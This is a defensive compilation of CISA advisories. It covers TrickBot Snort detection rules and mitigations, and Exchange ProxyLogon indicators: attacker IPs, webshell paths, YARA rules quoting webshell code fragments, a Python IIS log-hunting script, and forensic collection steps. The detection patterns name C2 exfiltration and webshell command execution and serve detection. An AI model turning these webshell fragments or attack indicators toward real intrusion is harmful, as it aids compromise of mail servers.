alert tcp any [443,447] -> any any (msg:"TRICKBOT:SSL/TLS Server X.509 Cert Field contains 'example.com' (Hex)"; sid:1; rev:1; flow:established,from_server; ssl_state:server_hello; content:"|0b|example.com"; fast_pattern:only; content:"Global Security"; content:"IT Department"; pcre:"/(?:\x09\x00\xc0\xb9\x3b\x93\x72\xa3\xf6\xd2|\x00\xe2\x08\xff\xfb\x7b\x53\x76\x3d)/"; classtype:bad-unknown; metadata:service ssl,service and-ports;)

alert tcp any any -> any $HTTP_PORTS (msg:"TRICKBOT_ANCHOR:HTTP URI GET contains '/anchor'"; sid:1; rev:1; flow:established,to_server; content:"/anchor"; http_uri; fast_pattern:only; content:"GET"; nocase; http_method; pcre:"/^\/anchor_?.{3}\/[\w_-]+\.[A-F0-9]+\/?$/U"; classtype:bad-unknown; priority:1; metadata:service http;)

alert tcp any $SSL_PORTS -> any any (msg:"TRICKBOT:SSL/TLS Server X.509 Cert Field contains 'C=XX, L=Default City, O=Default Company Ltd'"; sid:1; rev:1; flow:established,from_server; ssl_state:server_hello; content:"|31 0b 30 09 06 03 55 04 06 13 02|XX"; nocase; content:"|31 15 30 13 06 03 55 04 07 13 0c|Default City"; nocase; content:"|31 1c 30 1a 06 03 55 04 0a 13 13|Default Company Ltd"; nocase; content:!"|31 0c 30 0a 06 03 55 04 03|"; classtype:bad-unknown; reference:url,www.virustotal.com/gui/file/e9600404ecc42cf86d38deedef94068db39b7a0fd06b3b8fb2d8a3c7002b650e/detection; metadata:service ssl;)

alert tcp any any -> any $HTTP_PORTS (msg:"TRICKBOT:HTTP Client Header contains 'boundary=Arasfjasu7'"; sid:1; rev:1; flow:established,to_server; content:"boundary=Arasfjasu7|0d 0a|"; http_header; content:"name=|22|proclist|22|"; http_header; content:!"Referer"; content:!"Accept"; content:"POST"; http_method; classtype:bad-unknown; metadata:service http;)

alert tcp any any -> any $HTTP_PORTS (msg:"TRICKBOT:HTTP Client Header contains 'User-Agent|3a 20|WinHTTP loader/1.'"; sid:1; rev:1; flow:established,to_server; content:"User-Agent|3a 20|WinHTTP loader/1."; http_header; fast_pattern:only; content:".png|20|HTTP/1."; pcre:"/^Host\x3a\x20(?:\d{1,3}\.){3}\d{1,3}(?:\x3a\d{2,5})?$/mH"; content:!"Accept"; http_header; content:!"Referer|3a 20|"; http_header; classtype:bad-unknown; metadata:service http;)

alert tcp any $HTTP_PORTS -> any any (msg:"TRICKBOT:HTTP Server Header contains 'Server|3a 20|Cowboy'"; sid:1; rev:1; flow:established,from_server; content:"200"; http_stat_code; content:"Server|3a 20|Cowboy|0d 0a|"; http_header; fast_pattern; content:"content-length|3a 20|3|0d 0a|"; http_header; file_data; content:"/1/"; depth:3; isdataat:!1,relative; classtype:bad-unknown; metadata:service http;)

alert tcp any any -> any $HTTP_PORTS (msg:"TRICKBOT:HTTP URI POST contains C2 Exfil"; sid:1; rev:1; flow:established,to_server; content:"Content-Type|3a 20|multipart/form-data|3b 20|boundary=------Boundary"; http_header; fast_pattern; content:"User-Agent|3a 20|"; http_header; distance:0; content:"Content-Length|3a 20|"; http_header; distance:0; content:"POST"; http_method; pcre:"/^\/[a-z]{3}\d{3}\/.+?\.[A-F0-9]{32}\/\d{1,3}\//U"; pcre:"/^Host\x3a\x20(?:\d{1,3}\.){3}\d{1,3}$/mH"; content:!"Referer|3a|"; http_header; classtype:bad-unknown; metadata:service http;)

alert tcp any any -> any $HTTP_PORTS (msg:"HTTP URI GET/POST contains '/56evcxv' (Trickbot)"; sid:1; rev:1; flow:established,to_server; content:"/56evcxv"; http_uri; fast_pattern:only; classtype:bad-unknown; metadata:service http;)

alert icmp any any -> any any (msg:"TRICKBOT_ICMP_ANCHOR:ICMP traffic contains 'hanc'"; sid:1; rev:1; itype:8; content:"hanc"; offset:4; fast_pattern; classtype:bad-unknown;)

alert tcp any any -> any $HTTP_PORTS (msg:"HTTP Client Header contains POST with 'host|3a 20|*.onion.link' and 'data=' (Trickbot/Princess Ransomware)"; sid:1; rev:1; flow:established,to_server; content:"POST"; nocase; http_method; content:"host|3a 20|"; http_header; content:".onion.link"; nocase; http_header; distance:0; within:47; fast_pattern; file_data; content:"data="; distance:0; within:5; classtype:bad-unknown; metadata:service http;)

alert tcp any any -> any $HTTP_PORTS (msg:"HTTP Client Header contains 'host|3a 20|tpsci.com' (trickbot)"; sid:1; rev:1; flow:established,to_server; content:"host|3a 20|tpsci.com"; http_header; fast_pattern:only; classtype:bad-unknown; metadata:service http;)

Note: every rule above ships with sid:1. Assign each a unique SID from your local range before loading them; Snort identifies rules by gid:sid and will not load a set of rules that share one SID.

Mitigations

CISA and FBI recommend that network defenders in federal, state, local, tribal, and territorial governments and in the private sector consider applying the following best practices to strengthen the security posture of their organization's systems. System owners and administrators should review any configuration changes prior to implementation to avoid negative impacts.

- Provide social engineering and phishing training to employees.
- Consider drafting or updating a policy addressing suspicious emails that specifies users must report all suspicious emails to the security and/or IT departments.
- Mark external emails with a banner denoting the email is from an external source to assist users in detecting spoofed emails.
- Implement Group Policy Object and firewall rules.
- Implement an antivirus program and a formalized patch management process.
- Implement filters at the email gateway and block suspicious IP addresses at the firewall.
- Adhere to the principle of least privilege.
- Implement a Domain-based Message Authentication, Reporting & Conformance (DMARC) validation system.
- Segment and segregate networks and functions.
- Limit unnecessary lateral communications between network hosts, segments, and devices.
- Consider using application allowlisting technology on all assets to ensure that only authorized software executes and all unauthorized software is blocked from executing on assets. Ensure that such technology only allows authorized, digitally signed scripts to run on a system.
- Enforce multi-factor authentication.
- Enable a firewall on agency workstations configured to deny unsolicited connection requests.
- Disable unnecessary services on agency workstations and servers.
- Implement an intrusion detection system, if not already used, to detect C2 activity and other potentially malicious network activity.
- Monitor web traffic. Restrict user access to suspicious or risky sites.
- Maintain situational awareness of the latest threats and implement appropriate access control lists.
- Disable the use of SMBv1 across the network and require at least SMBv2 to harden systems against the network propagation modules used by TrickBot.

Visit the MITRE ATT&CK Techniques pages (linked in table 1 above) for additional mitigation and detection strategies. See CISA's Alert on Technical Approaches to Uncovering and Remediating Malicious Activity for more information on addressing potential incidents and applying best-practice incident response procedures. For additional information on malware incident prevention and handling, see the National Institute of Standards and Technology Special Publication 800-83, Guide to Malware Incident Prevention and Handling for Desktops and Laptops.

Resources
- CISA Fact Sheet: TrickBot Malware
- MS-ISAC White Paper: Security Primer – TrickBot
- United Kingdom National Cyber Security Centre Advisory: Ryuk Ransomware Targeting Organisations Globally
- CISA and MS-ISAC Joint Alert AA20-280A: Emotet Malware
- MITRE ATT&CK for Enterprise

References
[1] FireEye Blog: A Nasty Trick: From Credential Theft Malware to Business Disruption
[2] Eclypsium Blog: TrickBot Now Offers 'TrickBoot': Persist, Brick, Profit

Revisions
- March 17, 2021: Initial Version
- March 24, 2021: Added MITRE ATT&CK Technique T1592.003 used for reconnaissance
- May 20, 2021: Added new MITRE ATT&CK techniques and updated Table 1

  • AA21-062A: Mitigate Microsoft Exchange Server Vulnerabilities
    by CISA on 3 March 2021 at 6:12 pm

    Original release date: March 3, 2021 | Last revised: July 19, 2021

Summary

Updated July 19, 2021: The U.S. Government attributes this activity to malicious cyber actors affiliated with the People's Republic of China (PRC) Ministry of State Security (MSS). Additional information may be found in a statement from the White House. For more information on Chinese malicious cyber activity, refer to us-cert.cisa.gov/China.

Note: This Alert was updated April 13, 2021, to provide further guidance.

Cybersecurity and Infrastructure Security Agency (CISA) partners have observed active exploitation of vulnerabilities in Microsoft Exchange Server products. Successful exploitation of these vulnerabilities allows an unauthenticated attacker to execute arbitrary code on vulnerable Exchange Servers, enabling the attacker to gain persistent system access, as well as access to files and mailboxes on the server and to credentials stored on that system. Successful exploitation may additionally enable the attacker to compromise trust and identity in a vulnerable network.

Microsoft released out-of-band patches to address vulnerabilities in Microsoft Exchange Server. The vulnerabilities impact on-premises Microsoft Exchange Servers and are not known to impact Exchange Online or Microsoft 365 (formerly O365) cloud email services.

This Alert includes both the tactics, techniques, and procedures (TTPs) and the indicators of compromise (IOCs) associated with this malicious activity. To secure against this threat, CISA recommends organizations examine their systems for the TTPs and use the IOCs to detect any malicious activity. If an organization discovers exploitation activity, it should assume network identity compromise and follow incident response procedures. If an organization finds no activity, it should apply available patches immediately and implement the mitigations in this Alert. The IOCs are also available in STIX format.
Technical Details

(Updated April 14, 2021): Microsoft's April 2021 Security Update newly discloses and mitigates significant vulnerabilities affecting on-premises Exchange Server 2013, 2016, and 2019.

Microsoft has released out-of-band security updates to address four vulnerabilities in Exchange Server:

- CVE-2021-26855 allows an unauthenticated attacker to send arbitrary HTTP requests and authenticate as the Exchange Server. The vulnerability is a Server-Side Request Forgery (SSRF) exploited through the Exchange Control Panel (ECP). It also allows the attacker to gain access to mailboxes and read sensitive information.
- CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 allow for remote code execution.
  - CVE-2021-26858 and CVE-2021-27065 are similar post-authentication arbitrary file write vulnerabilities in Exchange. An attacker, authenticated either by using CVE-2021-26855 or via stolen admin credentials, could write a file to any path on the server.
  - CVE-2021-26857 is an insecure deserialization vulnerability in the Unified Messaging service. An attacker, authenticated either by using CVE-2021-26855 or via stolen admin credentials, could execute arbitrary code as SYSTEM on the Exchange Server.

To locate a possible compromise through these CVEs, CISA encourages organizations to read the Microsoft Advisory. It is possible for an attacker, once authenticated to the Exchange server, to gain access to the Active Directory environment and download the Active Directory database.

(Updated March 12, 2021): Microsoft Security Intelligence has released a tweet on DearCry ransomware being deployed on compromised on-premises Exchange Servers. Ransomware infections can have negative consequences for an affected organization, including temporary or permanent loss of sensitive or proprietary information, disruption to regular operations, financial losses incurred to restore systems and files, and potential harm to an organization's reputation.
(Updated April 12, 2021): CISA recommends organizations review Malware Analysis Report (MAR) MAR-10330097-1.v1 – DearCry Ransomware for detailed analysis, along with TTPs and IOCs.

(Updated March 12, 2021): CISA encourages organizations to review CISA's Ransomware web page for guidance and resources. Victims of ransomware should report it immediately to CISA at www.us-cert.gov/report, a local FBI Field Office, or a Secret Service Field Office.

Tactics, Techniques and Procedures

(Updated March 10, 2021): Microsoft has released a script that scans Exchange log files for IOCs. CISA strongly encourages organizations to run the Test-ProxyLogon.ps1 script as soon as possible to help determine whether their systems are compromised.

(Updated March 16, 2021): Note: Microsoft has released the Exchange On-premises Mitigation Tool (EOMT.ps1), which can automate portions of both the detection and patching process. Microsoft stated the following along with the release: "[the tool is intended] to help customers who do not have dedicated security or IT teams to apply these security updates. We have tested this tool across Exchange Server 2013, 2016, and 2019 deployments. This new tool is designed as an interim mitigation for customers who are unfamiliar with the patch/update process or who have not yet applied the on-premises Exchange security update." Review the EOMT.ps1 blog post for directions on using the tool.

(Updated March 10, 2021): CISA recommends investigating for signs of a compromise from at least January 1, 2021 through the present.

(Updated April 12, 2021): CISA has identified 10 webshells associated with this activity. This is not an all-inclusive list of the webshells being leveraged by the actors. CISA recommends organizations review the following MARs for detailed analysis of the 10 webshells, along with TTPs and IOCs. These MARs include CISA-developed YARA rules to help network defenders detect the associated malware.
- AR21-072A: MAR-10328877.r1.v1: China Chopper Webshell
- AR21-072B: MAR-10328923.r1.v1: China Chopper Webshell
- AR21-072C: MAR-10329107.r1.v1: China Chopper Webshell
- AR21-072D: MAR-10329297.r1.v1: China Chopper Webshell
- AR21-072E: MAR-10329298.r1.v1: China Chopper Webshell
- AR21-072F: MAR-10329301.r1.v1: China Chopper Webshell
- AR21-072G: MAR-10329494.r1.v1: China Chopper Webshell
- AR21-084A: MAR-10329496-1.v1: China Chopper Webshell
- AR21-084B: MAR-10329499-1.v1: China Chopper Webshell
- AR21-102A: MAR-10331466-1.v1: China Chopper Webshell

(Updated March 13, 2021): A webshell is a script that can be uploaded to a compromised Microsoft Exchange Server to enable remote administration of the machine. Webshells are utilized for the following purposes:

- To harvest and exfiltrate sensitive data and credentials;
- To upload additional malware, for example to create a watering hole for infection and scanning of further victims;
- To use as a relay point to issue commands to hosts inside the network without direct internet access;
- To use as command-and-control infrastructure, potentially in the form of a bot in a botnet or in support of compromises of additional external networks. This could occur if the adversary intends to maintain long-term persistence.

(Updated March 13, 2021): For more information, see TA15-314A Compromised Web Servers and Web Shells - Threat Awareness and Guidance.

The majority of the TTPs in this section are sourced from a blog post from Volexity, a third-party cybersecurity firm. Note: the United States Government does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the United States Government.
Volexity has observed the following files as targets of HTTP POST requests:

- /owa/auth/Current/themes/resources/logon.css
- /owa/auth/Current/themes/resources/owafont_ja.css
- /owa/auth/Current/themes/resources/lgnbotl.gif
- /owa/auth/Current/themes/resources/owafont_ko.css
- /owa/auth/Current/themes/resources/SegoeUI-SemiBold.eot
- /owa/auth/Current/themes/resources/SegoeUI-SemiLight.ttf

Administrators should search the ECP server logs for the following string (or something similar):

S:CMD=Set-OabVirtualDirectory.ExternalUrl='

The logs can be found at <exchange install path>\Logging\ECP\Server\.

To determine possible webshell activity, administrators should search for .aspx files in the following paths:

- \inetpub\wwwroot\aspnet_client\ (any .aspx file under this folder or its subfolders)
- \<exchange install path>\FrontEnd\HttpProxy\ecp\auth\ (any file besides TimeoutLogoff.aspx)
- \<exchange install path>\FrontEnd\HttpProxy\owa\auth\ (any file, or modified file, that is not part of a standard install)
- \<exchange install path>\FrontEnd\HttpProxy\owa\auth\Current\ (any .aspx file in this folder or its subfolders)
- \<exchange install path>\FrontEnd\HttpProxy\owa\auth\<folder with version number>\ (any .aspx file in this folder or its subfolders)

Administrators should search the web logs for requests to the /owa/auth/Current directory with the following non-standard user-agents. These agents may be useful for incident responders to determine whether further investigation is necessary.
These should not be taken as definitive IOCs:

- DuckDuckBot/1.0;+(+http://duckduckgo.com/duckduckbot.html)
- facebookexternalhit/1.1+(+http://www.facebook.com/externalhit_uatext.php)
- Mozilla/5.0+(compatible;+Baiduspider/2.0;++http://www.baidu.com/search/spider.html)
- Mozilla/5.0+(compatible;+Bingbot/2.0;++http://www.bing.com/bingbot.htm)
- Mozilla/5.0+(compatible;+Googlebot/2.1;++http://www.google.com/bot.html
- Mozilla/5.0+(compatible;+Konqueror/3.5;+Linux)+KHTML/3.5.5+(like+Gecko)+(Exabot-Thumbnails)
- Mozilla/5.0+(compatible;+Yahoo!+Slurp;+http://help.yahoo.com/help/us/ysearch/slurp)
- Mozilla/5.0+(compatible;+YandexBot/3.0;++http://yandex.com/bots)
- Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/51.0.2704.103+Safari/537.36

Volexity observed these user-agents in conjunction with exploitation of /ecp/ URLs:

- ExchangeServicesClient/0.0.0.0
- python-requests/2.19.1
- python-requests/2.25.1

These user-agents were also observed in connections for post-exploitation webshell access:

- antSword/v2.1
- Googlebot/2.1+(+http://www.googlebot.com/bot.html)
- Mozilla/5.0+(compatible;+Baiduspider/2.0;++http://www.baidu.com/search/spider.html)

As with the non-standard user-agents, responders can examine Internet Information Services (IIS) logs from Exchange Servers to identify possible historical activity. Also as with the non-standard user-agents, these should not be taken as definitive IOCs:

- POST /owa/auth/Current/
- POST /ecp/default.flt
- POST /ecp/main.css
- POST /ecp/<single char>.js

Volexity has seen attackers leverage the following IP addresses.
Although these are tied to virtual private servers (VPSs) and virtual private networks (VPNs), responders should investigate these IP addresses on their networks and act accordingly:

- 103.77.192[.]219
- 104.140.114[.]110
- 104.250.191[.]110
- 108.61.246[.]56
- 149.28.14[.]163
- 157.230.221[.]198
- 167.99.168[.]251
- 185.250.151[.]72
- 192.81.208[.]169
- 203.160.69[.]66
- 211.56.98[.]146
- 5.254.43[.]18
- 5.2.69[.]14
- 80.92.205[.]81
- 91.192.103[.]43

Volexity has also provided the following YARA signatures, which can be run within your network to assist in finding signs of a compromise.

rule webshell_aspx_simpleseesharp : Webshell Unclassified
{
    meta:
        author = "threatintel@volexity.com"
        date = "2021-03-01"
        description = "A simple ASPX Webshell that allows an attacker to write further files to disk."
        hash = "893cd3583b49cb706b3e55ecb2ed0757b977a21f5c72e041392d1256f31166e2"

    strings:
        $header = "<%@ Page Language=\"C#\" %>"
        $body = "<% HttpPostedFile thisFile = Request.Files[0];thisFile.SaveAs(Path.Combine"

    condition:
        $header at 0 and
        $body and
        filesize < 1KB
}

rule webshell_aspx_reGeorgTunnel : Webshell Commodity
{
    meta:
        author = "threatintel@volexity.com"
        date = "2021-03-01"
        description = "A variation on the reGeorg tunnel webshell"
        hash = "406b680edc9a1bb0e2c7c451c56904857848b5f15570401450b73b232ff38928"
        reference = "https://github.com/sensepost/reGeorg/blob/master/tunnel.aspx"

    strings:
        $s1 = "System.Net.Sockets"
        $s2 = "System.Text.Encoding.Default.GetString(Convert.FromBase64String(StrTr(Request.Headers.Get"
        // a bit more experimental
        $t1 = ".Split('|')"
        $t2 = "Request.Headers.Get"
        $t3 = ".Substring("
        $t4 = "new Socket("
        $t5 = "IPAddress ip;"

    condition:
        all of ($s*) or
        all of ($t*)
}

rule webshell_aspx_sportsball : Webshell Unclassified
{
    meta:
        author = "threatintel@volexity.com"
        date = "2021-03-01"
        description = "The SPORTSBALL webshell allows attackers to upload files or execute commands on the system."
        hash = "2fa06333188795110bba14a482020699a96f76fb1ceb80cbfa2df9d3008b5b0a"

    strings:
        $uniq1 = "HttpCookie newcook = new HttpCookie(\"fqrspt\", HttpContext.Current.Request.Form"
        $uniq2 = "ZN2aDAB4rXsszEvCLrzgcvQ4oi5J1TuiRULlQbYwldE="

        $var1 = "Result.InnerText = string.Empty;"
        $var2 = "newcook.Expires = DateTime.Now.AddDays("
        $var3 = "System.Diagnostics.Process process = new System.Diagnostics.Process();"
        $var4 = "process.StandardInput.WriteLine(HttpContext.Current.Request.Form[\""
        $var5 = "else if (!string.IsNullOrEmpty(HttpContext.Current.Request.Form[\""
        $var6 = "<input type=\"submit\" value=\"Upload\" />"

    condition:
        any of ($uniq*) or
        all of ($var*)
}

A list of webshell hashes has also been provided by Microsoft:

- b75f163ca9b9240bf4b37ad92bc7556b40a17e27c2b8ed5c8991385fe07d17d0
- 097549cf7d0f76f0d99edf8b2d91c60977fd6a96e4b8c3c94b0b1733dc026d3e
- 2b6f1ebb2208e93ade4a6424555d6a8341fd6d9f60c25e44afe11008f5c1aad1
- 65149e036fff06026d80ac9ad4d156332822dc93142cf1a122b1841ec8de34b5
- 511df0e2df9bfa5521b588cc4bb5f8c5a321801b803394ebc493db1ef3c78fa1
- 4edc7770464a14f54d17f36dc9d0fe854f68b346b27b35a6f5839adf1f13f8ea
- 811157f9c7003ba8d17b45eb3cf09bef2cecd2701cedb675274949296a6a183d
- 1631a90eb5395c4e19c7dbcbf611bbe6444ff312eb7937e286e4637cb9e72944

Note: this is not an all-inclusive list of indicators of compromise, and threat actors have been known to use short-term leased IP addresses that change very frequently. Organizations that do not locate any of the IOCs in this Alert within their network traffic may nevertheless have been compromised. CISA recommends following the guidance located in the Microsoft Advisory to check your servers for any signs of a compromise.
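The TTP section above gives three kinds of log-based indicator for the Exchange activity: the `S:CMD=Set-OabVirtualDirectory.ExternalUrl='` string in the ECP server logs, user-agents and POST targets in the IIS logs, and the Volexity IP list. The Python below is an added example, not part of the CISA alert or of Microsoft's Test-ProxyLogon.ps1: it parses IIS W3C extended logs using the `#Fields:` header so the column order does not matter, flags every record matching one of the alert's indicators with all the reasons it matched, and does a plain substring search over ECP server log lines. The IIS and ECP log lines embedded at the bottom are constructed for this example and are not real telemetry; as the alert says, hits on the user-agent and URI lists are leads for investigation, not definitive IOCs.

```python
import re
from typing import Dict, Iterator, List

# Indicators copied from the alert text above; every log line further down is
# constructed for this example, not real telemetry.
ECP_EXPLOIT_UAS = {"ExchangeServicesClient/0.0.0.0",
                   "python-requests/2.19.1", "python-requests/2.25.1"}
WEBSHELL_UAS = {"antSword/v2.1",
                "Googlebot/2.1+(+http://www.googlebot.com/bot.html)",
                "Mozilla/5.0+(compatible;+Baiduspider/2.0;++http://www.baidu.com/search/spider.html)"}
POST_TARGETS = {"/ecp/default.flt", "/ecp/main.css"}
POST_TARGET_RES = [re.compile(r"^/owa/auth/Current/", re.I),
                   re.compile(r"^/ecp/[^/]\.js$", re.I)]        # POST /ecp/<single char>.js
ATTACKER_IPS = {"103.77.192.219", "104.140.114.110", "104.250.191.110", "108.61.246.56",
                "149.28.14.163", "157.230.221.198", "167.99.168.251", "185.250.151.72",
                "192.81.208.169", "203.160.69.66", "211.56.98.146", "5.254.43.18",
                "5.2.69.14", "80.92.205.81", "91.192.103.43"}
ECP_SSRF_MARKER = "S:CMD=Set-OabVirtualDirectory.ExternalUrl='"


def parse_w3c(lines: List[str]) -> Iterator[Dict[str, str]]:
    """Yield one dict per IIS W3C record, naming columns from the #Fields header
    (IIS writes '+' for spaces inside fields, so a plain split is safe)."""
    fields = None
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        parts = line.split(" ")
        if len(parts) != len(fields):
            continue                      # truncated record: skip, never misalign
        yield dict(zip(fields, parts))


def hunt_iis(lines: List[str]) -> List[Dict[str, object]]:
    """Flag IIS records matching the alert's IOCs; each finding lists every reason."""
    findings: List[Dict[str, object]] = []
    for rec in parse_w3c(lines):
        method, uri = rec["cs-method"], rec["cs-uri-stem"]
        ua, src = rec["cs(User-Agent)"], rec["c-ip"]
        reasons = []
        if src in ATTACKER_IPS:
            reasons.append("known attacker IP")
        if uri.lower().startswith("/ecp/") and ua in ECP_EXPLOIT_UAS:
            reasons.append("exploit user-agent to /ecp/")
        if ua in WEBSHELL_UAS:
            reasons.append("webshell user-agent")
        if method == "POST" and (uri in POST_TARGETS or any(r.match(uri) for r in POST_TARGET_RES)):
            reasons.append("POST to static OWA/ECP resource")
        if reasons:
            findings.append({"when": f"{rec['date']} {rec['time']}", "src": src,
                             "request": f"{method} {uri}", "reasons": reasons})
    return findings


def hunt_ecp(lines: List[str]) -> List[int]:
    """1-based line numbers in an ECP server log containing the OAB ExternalUrl write."""
    return [n for n, line in enumerate(lines, 1) if ECP_SSRF_MARKER in line]


# Constructed sample logs (RFC 5737 test addresses for the non-listed sources).
IIS_SAMPLE = """#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status
2021-03-02 10:15:01 10.0.0.5 POST /owa/auth/Current/themes/resources/logon.css - 443 - 104.140.114.110 python-requests/2.25.1 - 200
2021-03-02 10:15:09 10.0.0.5 POST /ecp/y.js - 443 - 104.140.114.110 ExchangeServicesClient/0.0.0.0 - 200
2021-03-02 10:16:30 10.0.0.5 GET /owa/auth/logon.aspx url=https://mail.example.com/owa/ 443 - 198.51.100.7 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64) - 200
2021-03-02 10:20:11 10.0.0.5 POST /aspnet_client/x.aspx - 443 - 203.0.113.9 antSword/v2.1 - 200""".splitlines()

ECP_SAMPLE = [
    "2021-03-02T10:15:05.123Z,...,S:CMD=Get-OwaVirtualDirectory,...",
    "2021-03-02T10:15:09.456Z,...,S:CMD=Set-OabVirtualDirectory.ExternalUrl='<redacted>',...",
]

if __name__ == "__main__":
    for f in hunt_iis(IIS_SAMPLE):
        print(f["when"], f["src"], f["request"], "|", "; ".join(f["reasons"]))
    print("ECP log hits at lines:", hunt_ecp(ECP_SAMPLE))
```

On a real server, feed it the files under `<exchange install path>\Logging\HttpProxy\` (or the IIS W3SVC logs) and `<exchange install path>\Logging\ECP\Server\`; the benign `GET /owa/auth/logon.aspx` in the sample produces no finding, while the `antSword/v2.1` POST is flagged even though its source address is not on the IP list, which is the point of checking each indicator independently.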
Conduct Forensic Analysis

Should your organization see evidence of compromise, your incident response should begin with forensic analysis to collect artifacts and perform triage. The following recommendations describe how to conduct that analysis using various tools. Although the free tools listed are not endorsed by the Federal Government, incident responders commonly use them to perform forensics.

While collecting artifacts for triage, use processes and tools that minimize the alteration of the data being collected and minimize the impact on the operating system itself. Ideally, store the collected data on removable/external media and, when possible, run the collection tools from that same media.

Key artifacts to collect for triage:
- Memory
- All registry hives
- All Windows event logs
- All web logs

Memory can be collected with a variety of free tools (e.g., FTK Imager by AccessData, RAM Capturer by Belkasoft). Registry hives and Windows event logs can also be collected with a variety of free tools (e.g., FTK Imager, Kroll Artifact Parser And Extractor [KAPE]). Web logs can likewise be collected with such tools (e.g., FTK Imager).

Windows Artifact Collection Guide

Execute the following steps in order.

1) Download the latest FTK Imager from https://accessdata.com/product-download/. Note: Ensure your review of and compliance with the applicable license associated with the product referenced, which can be found in the product's User Guide. The United States Government does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the United States Government.

2) Collect memory from the live system using FTK Imager.
See "Memory Capture with FTK Imager" below for instructions. Note: Download and copy the "FTK Imager" folder to an external drive, and run FTK Imager.exe from that folder on the external drive. Wait until the memory collection is complete before proceeding to step 3.

3) Collect important system artifacts using KAPE. See "KAPE Collection Procedure" below. Note: Download KAPE from a separate system; do not download KAPE to the target system. Run KAPE from the external drive.

4) Collect a disk image using FTK Imager. See Live Image with FTK Imager.pdf for instructions. Note: Run FTK Imager.exe from the "FTK Imager" folder on the external drive.

Memory Capture with FTK Imager

1) Open FTK Imager. Log into the system with Administrator privileges and launch "FTK Imager." Note: Ensure your review of and compliance with the applicable license associated with the product referenced. The United States Government does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the United States Government.

2) Open "Capture Memory." Select "Capture Memory..." from the File menu.

Figure 1: FTK Imager – Capture Memory Command

3) Select the path and filenames. In the window that appears, use the "Browse" button to choose the destination of the memory capture. Save the memory capture to an external device, not the system's main hard drive, so that the saved file does not overwrite any data on the system. Give the destination file a descriptive name (e.g., the hostname of the system). Select the "Include pagefile" box and provide a pagefile name that is descriptive of the system. Do not select "Create AD1 file."

Figure 2: FTK Imager – Memory Capture

4) Capture memory. Click "Capture Memory" to begin the capture process.
The process will take several minutes depending on the size of the pagefile and the amount of memory on the system.

Figure 3: FTK Imager – Capture Process

KAPE Collection Procedure [1]

1) Download KAPE from https://www.kroll.com/en/services/cyber-risk/investigate-and-respond/kroll-artifact-parser-extractor-kape.

2) Disable any antivirus or host protection mechanisms that prevent execution from removable media, and any data loss prevention (DLP) mechanisms that restrict the use of removable media. Re-enable antivirus and host protection once this process is completed.

3) Unzip Kape.zip and run gkape.exe as admin from your removable media.

4) The Target source should be the drive on which the OS resides, typically C:.

5) The Target destination should be a folder on an external drive, not the same drive as the Target source. If available, use an external hard drive or flash drive. A KAPE execution with these parameters will typically produce output artifacts with a total size of 1-25 GB. If you are going to run KAPE on different machines and save to the same drive, ensure the Target destination folder is unique for each execution of KAPE.

6) Uncheck the Flush checkbox (it is checked by default).

7) Check the Add %d and Add %m checkboxes.

8) Select ALL checkboxes to ensure KAPE will target all available data it is capable of targeting. This takes some time; use the down arrow and space bar to move through the list quickly.

9) Check the Process VSCs checkbox.

10) Select the Zip radio button and add the Base name TargetOutput.

11) Ensure the Deduplicate checkbox is checked (it is checked by default).
At the bottom you should now see a long Current command line, similar to:

.\kape.exe --tsource C: --tdest E:\%d%m --tflush --target !BasicCollection,!SANS_Triage,Avast,AviraAVLogs,Bitdefender,ComboFix,ESET,FSecure,HitmanPro,Malwarebytes,McAfee,McAfee_ePO,RogueKiller,SentinelOne,Sophos,SUPERAntiSpyware,Symantec_AV_Logs,TrendMicro,VIPRE,Webroot,WindowsDefender,Ammyy,AsperaConnect,BoxDrive,CiscoJabber,CloudStorage,ConfluenceLogs,Discord,Dropbox,Exchange,ExchangeClientAccess,ExchangeTransport,FileZilla,GoogleDrive,iTunesBackup,JavaWebCache,Kaseya,LogMeIn,Notepad++,OneDrive,OutlookPSTOST,ScreenConnect,Skype,TeamViewerLogs,TeraCopy,VNCLogs,Chrome,ChromeExtensions,Edge,Firefox,InternetExplorer,WebBrowsers,ApacheAccessLog,IISLogFiles,ManageEngineLogs,MSSQLErrorLog,NGINXLogs,PowerShellConsole,KapeTriage,MiniTimelineCollection,RemoteAdmin,VirtualDisks,Gigatribe,TorrentClients,Torrents,$Boot,$J,$LogFile,$MFT,$SDS,$T,Amcache,ApplicationEvents,BCD,CombinedLogs,EncapsulationLogging,EventLogs,EventLogs-RDP,EventTraceLogs,EvidenceOfExecution,FileSystem,GroupPolicy,LinuxOnWindowsProfileFiles,LnkFilesAndJumpLists,LogFiles,MemoryFiles,MOF,OfficeAutosave,OfficeDocumentCache,Prefetch,RDPCache,RDPLogs,RecentFileCache,Recycle,RecycleBin,RecycleBinContent,RecycleBinMetadata,RegistryHives,RegistryHivesSystem,RegistryHivesUser,ScheduledTasks,SDB,SignatureCatalog,SRUM,StartupInfo,Syscache,ThumbCache,USBDevicesLogs,WBEM,WER,WindowsFirewall,WindowsIndexSearch,WindowsNotifcationsDB,WindowsTimeline,XPRestorePoints --vss --zip TargetOutput --gui

Note: the --tflush switch in the command above corresponds to the Flush checkbox; with step 6 applied it will not appear in your command line. That is the intended state, since --tflush deletes the contents of the Target destination before collection starts.

In the bottom right corner click the Execute! button. The screenshot below shows gkape.exe during execution; a command window will also open. Note: KAPE usually takes less than 20 minutes to complete on a workstation; if it is taking significantly longer, there may be an issue.
Figure 4: gkape.exe screenshot

Mitigations

CISA strongly recommends organizations read Microsoft's advisory and security blog post for more information on how to look for this malicious activity, and apply the critical patches as soon as possible.

